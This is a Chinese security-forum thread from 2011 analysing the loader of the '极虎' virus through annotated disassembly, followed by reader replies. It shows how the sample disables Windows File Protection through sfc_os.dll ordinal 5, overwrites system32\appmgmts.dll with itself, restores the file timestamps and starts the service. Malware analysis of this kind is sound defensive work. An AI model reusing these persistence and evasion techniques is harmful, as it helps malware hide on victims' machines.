极虎样本分析 by 零度x[LSG]
本帖最后由 是昔流芳 于 2011-2-11 12:14 编辑第一次分析病毒,比较菜,只分析了exe的运行过程,大牛们勿笑我,新手,求鼓励~
关闭windows文件保护,更改自身属性为DLL,写入C:\WINDOWS\system32\appmgmts.dll并以服务方式启动
00401B9A|.6A 1C push 1C ; /BufSize = 1C (28.)
00401B9C|.8D45 E4 lea eax, dword ptr ; |
00401B9F|.50 push eax ; |Buffer
00401BA0|.FF75 E0 push dword ptr ; |Address
00401BA3|.FF15 2C914000 call dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00401BA9|.8B45 E8 mov eax, dword ptr ;VirTualQuery获取内存信息
00401BAC|.A3 38DC4000 mov dword ptr , eax
00401BB1|.6A 00 push 0 ; /pModule = NULL
00401BB3|.FF15 04914000 call dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA
00401BB9|.3B05 38DC4000 cmp eax, dword ptr ;GetModuleHandle获取当前模块基址
00401BBF|.75 16 jnz short 00401BD7 ;两者比较,不要相等则退出线程
00402056 .FF15 14924000 call dword ptr [<&USER32.GetInputStat>; [GetInputState
0040205C .6A 00 push 0 ; /lParam = 0
0040205E .6A 00 push 0 ; |wParam = 0
00402060 .6A 00 push 0 ; |Message = WM_NULL
00402062 .FF15 48914000 call dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
00402068 .50 push eax ; |ThreadId
00402069 .FF15 18924000 call dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA
0040206F .6A 00 push 0 ; /MsgFilterMax = 0
00402071 .6A 00 push 0 ; |MsgFilterMin = 0
00402073 .6A 00 push 0 ; |hWnd = NULL
00402075 .8D85 BCFDFFFF lea eax, dword ptr ; |
0040207B .50 push eax ; |pMsg
0040207C .FF15 0C924000 call dword ptr [<&USER32.GetMessageA>>; \GetMessageA
004064B4|.68 04010000 push 104 ; /BufSize = 104 (260.)
004064B9|.8D85 D8FDFFFF lea eax, dword ptr ; |
004064BF|.50 push eax ; |PathBuffer
004064C0|.6A 00 push 0 ; |hModule = NULL
004064C2|.FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004064C8|.68 04010000 push 104 ; /获取当前路径
004064CD|.6A 00 push 0 ; |c = 00
004064CF|.8D85 E0FEFFFF lea eax, dword ptr ; |
004064D5|.50 push eax ; |s
004064D6|.E8 67290000 call <jmp.&MSVCRT.memset> ; \memset
004064DB|.83C4 0C add esp, 0C
004064DE|.8D85 D8FDFFFF lea eax, dword ptr
004064E4|.50 push eax ; /String2
004064E5|.8D85 E0FEFFFF lea eax, dword ptr ; |
004064EB|.50 push eax ; |String1
004064EC|.FF15 1C914000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
004064F2|.68 01010000 push 101 ; /n = 101 (257.)
004064F7|.6A 00 push 0 ; |c = 00
004064F9|.8D85 E3FEFFFF lea eax, dword ptr ; |
004064FF|.50 push eax ; |s
00406500|.E8 3D290000 call <jmp.&MSVCRT.memset> ; \memset
00406505|.83C4 0C add esp, 0C ;保留路径前三个字节(获取当前磁盘)
00406508|.8D85 E0FEFFFF lea eax, dword ptr
0040650E|.50 push eax ; /RootPathName
0040650F|.FF15 A4904000 call dword ptr [<&KERNEL32.GetDriveTy>; \GetDriveTypeA
00406515|.83F8 02 cmp eax, 2 ;判断当前磁盘类型
00406518|.75 39 jnz short 00406553 ;-------------------------------------------
0040651A|.8D85 E0FEFFFF lea eax, dword ptr
00406520|.50 push eax ; /<%s>
00406521|.68 A09A4000 push 00409AA0 ; |Format = "/n,%s"
00406526|.8D85 98FDFFFF lea eax, dword ptr ; |
0040652C|.50 push eax ; |s
0040652D|.FF15 10924000 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00406533|.83C4 0C add esp, 0C
00406536|.6A 05 push 5 ; /IsShown = 5
00406538|.6A 00 push 0 ; |DefDir = NULL
0040653A|.8D85 98FDFFFF lea eax, dword ptr ; |
00406540|.50 push eax ; |Parameters
00406541|.68 A89A4000 push 00409AA8 ; |FileName = "explorer.exe"
00406546|.68 B89A4000 push 00409AB8 ; |Operation = "open"
0040654B|.6A 00 push 0 ; |hWnd = NULL
0040654D|.FF15 E4914000 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
00406553|>C745 EC C09A4>mov dword ptr , 00409AC0 ;------------如果为移动设备则打explorer-----
00401681|> \6A 00 push 0 ; /hTemplateFile = NULL
00401683|.68 80000000 push 80 ; |Attributes = NORMAL
00401688|.FFB5 E8FEFFFF push dword ptr ; |Mode
0040168E|.6A 00 push 0 ; |pSecurity = NULL
00401690|.6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401692|.68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401697|.68 08934000 push 00409308 ; |FileName = "C:\DelInfo.bin"
0040169C|.FF15 C4904000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004016A2|.8985 ECFEFFFF mov dword ptr , eax ;创建文件C:\Delinfo.bin
0040175C|> \6A 00 push 0 ; /pOverlapped = NULL
0040175E|.8D45 FC lea eax, dword ptr ; |
00401761|.50 push eax ; |pBytesWritten
00401762|.6A 04 push 4 ; |nBytesToWrite = 4
00401764|.8D45 0C lea eax, dword ptr ; |
00401767|.50 push eax ; |Buffer
00401768|.FFB5 ECFEFFFF push dword ptr ; |hFile
0040176E|.FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00401774|.6A 00 push 0 ; /写入01000000
00401776|.8D45 FC lea eax, dword ptr ; |
00401779|.50 push eax ; |pBytesWritten
0040177A|.FF75 08 push dword ptr ; |/String
0040177D|.FF15 D0904000 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
00401783|.50 push eax ; |nBytesToWrite
00401784|.FF75 08 push dword ptr ; |Buffer
00401787|.FFB5 ECFEFFFF push dword ptr ; |hFile
0040178D|.FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00401793|.FFB5 ECFEFFFF push dword ptr ; /01000000之后写入自身路径
00401799|.FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401C0B|.68 04010000 push 104 ; /BufSize = 104 (260.)
00401C10|.8D85 E8FEFFFF lea eax, dword ptr ; |
00401C16|.50 push eax ; |PathBuffer
00401C17|.FF75 08 push dword ptr ; |hModule
00401C1A|.FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401C20|.83A5 E0FEFFFF>and dword ptr , 0 ;获取路径
00401C27|.EB 0D jmp short 00401C36
00401C29|>8B85 E0FEFFFF /mov eax, dword ptr
00401C2F|.40 |inc eax
00401C30|.8985 E0FEFFFF |mov dword ptr , eax
00401C36|>83BD E0FEFFFF> cmp dword ptr , 32
00401C3D|.7D 31 |jge short 00401C70
00401C3F|.6A 00 |push 0 ; /hTemplateFile = NULL
00401C41|.6A 00 |push 0 ; |Attributes = 0
00401C43|.6A 03 |push 3 ; |Mode = OPEN_EXISTING
00401C45|.6A 00 |push 0 ; |pSecurity = NULL
00401C47|.6A 01 |push 1 ; |ShareMode = FILE_SHARE_READ
00401C49|.68 00000080 |push 80000000 ; |Access = GENERIC_READ
00401C4E|.8D85 E8FEFFFF |lea eax, dword ptr ; |
00401C54|.50 |push eax ; |FileName
00401C55|.FF15 C4904000 |call dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00401C5B|.8945 F4 |mov dword ptr , eax ;打开自身
00401C70|> \6A 00 push 0 ; /pFileSizeHigh = NULL
00401C72|.FF75 F4 push dword ptr ; |hFile
00401C75|.FF15 24914000 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00401C7B|.8945 F8 mov dword ptr , eax ;得到自身大小
00401CEF|.6A 00 push 0 ; /pOverlapped = NULL
00401CF1|.8D45 FC lea eax, dword ptr ; |
00401CF4|.50 push eax ; |pBytesRead
00401CF5|.FF75 F8 push dword ptr ; |BytesToRead
00401CF8|.FFB5 E4FEFFFF push dword ptr ; |Buffer
00401CFE|.FF75 F4 push dword ptr ; |hFile
00401D01|.FF15 EC904000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00401D07|.FF75 F4 push dword ptr ; /把自身读入缓冲区
00401D0A|.FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004020AE .68 04010000 push 104 ; /BufSize = 104 (260.)
004020B3 .8D85 D8FDFFFF lea eax, dword ptr ; |
004020B9 .50 push eax ; |Buffer
004020BA .FF15 38914000 call dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
004020C0 .68 04010000 push 104 ; /得到系统目录
004020C5 .6A 00 push 0 ; |c = 00
004020C7 .8D85 E8FEFFFF lea eax, dword ptr ; |
004020CD .50 push eax ; |s
004020CE .E8 6F6D0000 call <jmp.&MSVCRT.memset> ; \memset
004020D3 .83C4 0C add esp, 0C
004020D6 .8D85 E8FEFFFF lea eax, dword ptr
004020DC .50 push eax ; /Buffer
004020DD .68 04010000 push 104 ; |BufSize = 104 (260.)
004020E2 .FF15 4C914000 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
004020E8 .68 3F000F00 push 0F003F ;得到临时目录
004020ED .6A 00 push 0
004020EF .6A 00 push 0
004020F1 .FF15 18904000 call dword ptr [<&ADVAPI32.OpenSCMana>;ADVAPI32.OpenSCManagerA
004020F7 .8945 FC mov dword ptr , eax ;打开scm
004020FA .68 B0944000 push 004094B0 ; /FileName = "sfc_os.dll"
004020FF .FF15 40914000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402105 .8985 B4F9FFFF mov dword ptr , eax ;加载sfc_os.dll
0040211E > \6A 05 push 5 ; /ProcNameOrOrdinal = #5
00402120 .FFB5 B4F9FFFF push dword ptr ; |hModule
00402126 .FF15 F4904000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
0040212C .A3 44DC4000 mov dword ptr , eax ;获取SetSfcFileException
004021B8 > \68 FF010F00 push 0F01FF
004021BD .8D85 30F4FFFF lea eax, dword ptr
004021C3 .50 push eax
004021C4 .FF75 FC push dword ptr
004021C7 .FF15 14904000 call dword ptr [<&ADVAPI32.OpenServic>;ADVAPI32.OpenServiceA
004021CD .8985 E0FEFFFF mov dword ptr , eax ;打开AppMgmt(服务管理器)
004021FA .50 push eax
004021FB .FFB5 E0FEFFFF push dword ptr
00402201 .FF15 04904000 call dword ptr [<&ADVAPI32.QueryServi>;ADVAPI32.QueryServiceStatus
00402207 .83BD D8F3FFFF>cmp dword ptr , 1 ;查询服务状态
0040225C .8D85 F0F3FFFF lea eax, dword ptr
00402262 .50 push eax ; /<%s>
00402263 .8D85 D8FDFFFF lea eax, dword ptr ; |
00402269 .50 push eax ; |<%s>
0040226A .68 BC944000 push 004094BC ; |Format = "%s\system32\%s.dll"
0040226F .8D85 A8F8FFFF lea eax, dword ptr ; |
00402275 .50 push eax ; |s
00402276 .FF15 10924000 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
0040227C .83C4 10 add esp, 10 ;构造字符串C:\WINDOWS\system32\appmgmts.dll
0040227F .8D85 A8F8FFFF lea eax, dword ptr
00402285 .50 push eax
00401E53 .FF75 08 push dword ptr ; /Path = "C:\WINDOWS\system32\appmgmts.dll"
00401E56 .FF15 F0914000 call dword ptr [<&SHLWAPI.PathFileExistsA>] ; \PathFileExistsA
00401E5C .83F8 01 cmp eax, 1 ;判断C:\WINDOWS\system32\appmgmts.dll是否存在
00401E91 .FFB5 B4F7FFFF push dword ptr ; /WideBufSize
00401E97 .8D85 B8F7FFFF lea eax, dword ptr ; |
00401E9D .50 push eax ; |WideCharBuf
00401E9E .FFB5 B4F7FFFF push dword ptr ; |StringSize
00401EA4 .FF75 08 push dword ptr ; |StringToMap = "C:\WINDOWS\system32\appmgmts.dll"
00401EA7 .6A 00 push 0 ; |Options = 0
00401EA9 .6A 00 push 0 ; |CodePage = CP_ACP
00401EAB .FF15 98904000 call dword ptr [<&KERNEL32.MultiByteToWideChar>]; \MultiByteToWideChar
00401EB1 .8365 FC 00 and dword ptr , 0 ;转换"C:\WINDOWS\system32\appmgmts.dll"成unicode
00401EB5 .6A FF push -1
00401EB7 .8D85 B8F7FFFF lea eax, dword ptr
00401EBD .50 push eax
00401EBE .6A 00 push 0
00401EC0 .68 F91E4000 push 00401EF9
00401EC5 .8BFF mov edi, edi
00401EC7 .55 push ebp
00401EC8 .A1 44DC4000 mov eax, dword ptr
00401ECD .83C0 03 add eax, 3
00401ED0 .FFE0 jmp eax ;关闭windows文件保护
00401F14 > \6A 00 push 0 ; /hTemplateFile = NULL
00401F16 .6A 00 push 0 ; |Attributes = 0
00401F18 .FF75 D0 push dword ptr ; |Mode
00401F1B .6A 00 push 0 ; |pSecurity = NULL
00401F1D .6A 00 push 0 ; |ShareMode = 0
00401F1F .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401F24 .FF75 08 push dword ptr ; |FileName
00401F27 .FF15 C4904000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA
00401F2D .8945 D4 mov dword ptr , eax ;打开C:\WINDOWS\system32\appmgmts.dll
00401F50 .50 push eax ; /pLastWrite = 0012F304
00401F51 .8D45 C0 lea eax, dword ptr ; |
00401F54 .50 push eax ; |pLastAccess
00401F55 .8D45 B8 lea eax, dword ptr ; |
00401F58 .50 push eax ; |pCreationTime
00401F59 .FF75 D4 push dword ptr ; |hFile
00401F5C .FF15 44914000 call dword ptr [<&KERNEL32.GetFileTime>] ; \GetFileTime
00401F62 .837D D0 02 cmp dword ptr , 2 ;获取文件时间
00401F9A > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401F9C .6A 00 push 0 ; |pOffsetHi = NULL
00401F9E .FF75 DC push dword ptr ; |OffsetLo
00401FA1 .FF75 D4 push dword ptr ; |hFile
00401FA4 .FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FAA .A1 3CDC4000 mov eax, dword ptr ;设置文件指针到文件偏移3C
00401FAF .0345 DC add eax, dword ptr
00401FB2 .8945 E4 mov dword ptr , eax
00401FB5 .6A 00 push 0 ; /pOverlapped = NULL
00401FB7 .8D45 D8 lea eax, dword ptr ; |
00401FBA .50 push eax ; |pBytesWritten
00401FBB .A1 40DC4000 mov eax, dword ptr ; |
00401FC0 .2B45 DC sub eax, dword ptr ; |
00401FC3 .50 push eax ; |nBytesToWrite
00401FC4 .FF75 E4 push dword ptr ; |Buffer
00401FC7 .FF75 D4 push dword ptr ; |hFile
00401FCA .FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>] ; \WriteFile
00401FD0 .85C0 test eax, eax ;写入数据C:\WINDOWS\system32\appmgmts.dll
00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401FE3 .6A 00 push 0 ; |pOffsetHi = NULL
00401FE5 .FF35 40DC4000 push dword ptr ; |OffsetLo = 3CC00 (248832.)
00401FEB .FF75 D4 push dword ptr ; |hFile
00401FEE .FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FF4 .FF75 D4 push dword ptr ; /hFile
00401FF7 .FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile
00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401FE3 .6A 00 push 0 ; |pOffsetHi = NULL
00401FE5 .FF35 40DC4000 push dword ptr ; |OffsetLo = 3CC00 (248832.)
00401FEB .FF75 D4 push dword ptr ; |hFile
00401FEE .FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FF4 .FF75 D4 push dword ptr ; /hFile
00401FF7 .FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile
00401FFD .8D45 C8 lea eax, dword ptr ;把自身写进C:\WINDOWS\system32\appmgmts.dll
00402000 .50 push eax ; /pLastWrite
00402001 .8D45 C0 lea eax, dword ptr ; |
00402004 .50 push eax ; |pLastAccess
00402005 .8D45 B8 lea eax, dword ptr ; |
00402008 .50 push eax ; |pCreationTime
00402009 .FF75 D4 push dword ptr ; |hFile
0040200C .FF15 34914000 call dword ptr [<&KERNEL32.SetFileTime>] ; \SetFileTime
00402012 .FF75 D4 push dword ptr ;还原设置文件时间
00402293 > \6A 00 push 0
00402295 .6A 00 push 0
00402297 .FFB5 E0FEFFFF push dword ptr
0040229D .FF15 24904000 call dword ptr [<&ADVAPI32.StartServiceA>] ;ADVAPI32.StartServiceA启动服务
好久没有分析文章出来了,先休息了,明天看下,感谢分享! 写的不错,感谢分享,顺便把释放的东西也分析下吧~ 哈哈不错 我真佩服 很不错的说~~ 感谢分享……
可以使用文件监视器 filemon 和 regmon 监视 生成了那些文件。
然后分析下~~ 写的很好最好再分类下 加精鼓励下,loader部分大概这么多,有时间再分析下主体DLL吧. 多谢鼓励,正在分析~ 004020FA .68 B0944000 push 004094B0 ; /FileName = "sfc_os.dll"
004020FF .FF15 40914000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402105 .8985 B4F9FFFF mov dword ptr , eax ;加载sfc_os.dll
0040211E > \6A 05 push 5 ; /ProcNameOrOrdinal = #5
00402120 .FFB5 B4F9FFFF push dword ptr ; |hModule
00402126 .FF15 F4904000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
这里是调用sfc_os.dll的5号服务,关闭系统文件保护,这样替换系统文件就不会提示了. 学习了~